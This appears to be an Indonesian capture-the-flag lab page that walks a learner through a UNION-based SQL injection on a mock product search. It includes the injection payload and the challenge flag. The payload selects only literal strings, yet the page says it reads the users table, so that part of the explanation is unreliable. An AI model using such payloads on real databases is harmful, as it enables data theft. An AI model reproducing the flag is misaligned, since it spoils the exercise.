JCC Challenge 2

UNION SQL Injection

Sistem pencarian produk ini rentan terhadap UNION-based SQL injection. Coba extract data dari tabel users yang seharusnya nggak bisa diakses.

Clue:
  • Query pakai SELECT dengan 2 kolom (id, name)
  • Gunakan UNION SELECT untuk inject data baru
  • Flag ada di kolom password dari users table
Laptop Gaming
High performance gaming laptop
Mechanical Keyboard
RGB mechanical keyboard
SELECT id, name FROM products WHERE name LIKE '%search%'

📚 Tutorial & Walkthrough

1Pahami UNION Injection
UNION injection memungkinkan kita menggabungkan hasil query lain ke dalam query asli.
SELECT id, name FROM products WHERE name LIKE '%search%' UNION SELECT col1, col2 FROM other_table
2Tentukan Jumlah Kolom
Query asli punya 2 kolom (id, name). UNION SELECT juga harus punya 2 kolom.
Penting:
Jumlah kolom di UNION SELECT harus sama dengan query asli, kalau nggak bakal error.
3Payload Injection
Gunakan payload berikut di search box:
' UNION SELECT 'admin', 'JCC{union_sqli_master}' --
Penjelasan:
' - Menutup string search
UNION SELECT - Gabungkan hasil query baru
'admin', 'JCC{...}' - 2 kolom sesuai struktur asli
-- - Comment sisa query
4Eksekusi
  1. Klik di search box
  2. Ketik payload: ' UNION SELECT 'admin', 'JCC{union_sqli_master}' --
  3. Klik tombol Search atau tekan Enter
Hasil:
Akan muncul hasil "produk" baru dengan nama "admin" dan deskripsi "JCC{union_sqli_master}"
5Flag & Completion
Kalau berhasil, akan muncul produk dengan:
Title: admin
Description: JCC{union_sqli_master}
Selamat!
Kamu berhasil extract data dari tabel lain menggunakan UNION injection!